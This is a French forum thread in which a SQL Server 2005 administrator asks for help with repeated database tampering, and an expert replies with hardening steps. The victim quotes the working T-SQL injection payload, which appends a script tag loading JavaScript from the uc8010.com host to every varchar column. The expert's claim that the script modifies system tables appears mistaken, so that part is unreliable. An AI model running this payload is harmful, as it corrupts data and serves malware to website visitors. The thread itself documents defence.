uc8010 fake

Le
jpayenneville
Bonjour,

Depuis quelques jours, j'ai un probleme avec ma base de données Sql
Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
n'arrete pas de corompre mes bases en mofidiant les champs de type
string de tous les tables en mettant un tag script pointant vers un
fichier javascript sur le serveur uc8010.com.

Je n'arrive pas à detecter d'ou cela peut venir, virus, injection
Sql,. Je ne vois aucune trace.
A l'aide, si quelqu'un connait la solution.

Merci
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Fred BROUARD
Le #11884471
a écrit :
Bonjour,

Depuis quelques jours, j'ai un probleme avec ma base de données Sql
Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
n'arrete pas de corompre mes bases en mofidiant les champs de type
string de tous les tables en mettant un tag script pointant vers un
fichier javascript sur le serveur uc8010.com.

Je n'arrive pas à detecter d'ou cela peut venir, virus, injection
Sql,.... Je ne vois aucune trace.
A l'aide, si quelqu'un connait la solution.

Merci


Utilisez un profiler SQL pour voir ce qui se passe.

A +

--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
*********************** http://www.sqlspot.com *************************
jpayenneville
Le #11884441
On 2 jan, 16:18, Fred BROUARD
a écrit :> Bonjour,

> Depuis quelques jours, j'ai un probleme avec ma base de données Sql
> Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
> n'arrete pas de corompre mes bases en mofidiant les champs de type
> string de tous les tables en mettant un tag script pointant vers un
> fichier javascript sur le serveur uc8010.com.

> Je n'arrive pas à detecter d'ou cela peut venir, virus, injection
> Sql,.... Je ne vois aucune trace.
> A l'aide, si quelqu'un connait la solution.

> Merci

Utilisez un profiler SQL pour voir ce qui se passe.

A +

--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR  :  http://sqlpro.developpez.c om
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
***********************http://www.sqlspot.com*************************



Déjà fait !!!
Malheuresement je n'ai rien vu.
En plus, les applications de notre systeme d'information utilisent la
même authentification, à savoir un user spécifique.
Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la
machine.

Apparement l'injection realise cette procedure :

declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name
+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);


Comment eviter que ça se reproduise ?
merci
Fred BROUARD
Le #11884411
Il suffit d'avoir une sécurité correcte de votre serveur et à mon avis
le votre est une vraie passoire :
1) baissez les privilèges de sa/dbo au minimum
2) changeez les mots de passe de tous les utilisateurs
3) n'utilisez JAMAIS sa comme compte de connexion pour vos applications
4) utilisez des mots de passe pour tous les utilisateurs SQL
5) lancez : EXEC sp_configure 'allow updates ', 0
Désormais votre intru ne pourra plus aller modifier les tables systèmes !

Car c'est ce que fait votre script, et cela n'est possible que si votre
trubion à des privilèges "sysadmin" ce qui laisse à pense que votre
sécurité est une passoire et de sus cela n'est possible que si les
tables systèmes peuvent être mise à jour, or ceci n'est possible que si
le paramètre de serveur "allow updates" est à 1

A +

a écrit :
On 2 jan, 16:18, Fred BROUARD
a écrit :> Bonjour,

Depuis quelques jours, j'ai un probleme avec ma base de données Sql
Server 2005 !!! Je n'arrete pas de me faire attaquer. une personne
n'arrete pas de corompre mes bases en mofidiant les champs de type
string de tous les tables en mettant un tag script pointant vers un
fichier javascript sur le serveur uc8010.com.
Je n'arrive pas à detecter d'ou cela peut venir, virus, injection
Sql,.... Je ne vois aucune trace.
A l'aide, si quelqu'un connait la solution.
Merci


Utilisez un profiler SQL pour voir ce qui se passe.

A +

--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
***********************http://www.sqlspot.com*************************



Déjà fait !!!
Malheuresement je n'ai rien vu.
En plus, les applications de notre systeme d'information utilisent la
même authentification, à savoir un user spécifique.
Et à ma connaissance, dans le profiler, je n'ai pas l'adresse de la
machine.

Apparement l'injection realise cette procedure :

declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name
+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://c.uc8010.com/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);


Comment eviter que ça se reproduise ?
merci




--
Frédéric BROUARD, MVP SQL Server, expert bases de données et langage SQL
Le site sur le langage SQL et les SGBDR : http://sqlpro.developpez.com
Audit, conseil, expertise, formation, modélisation, tuning, optimisation
*********************** http://www.sqlspot.com *************************
Publicité
Poster une réponse
Anonyme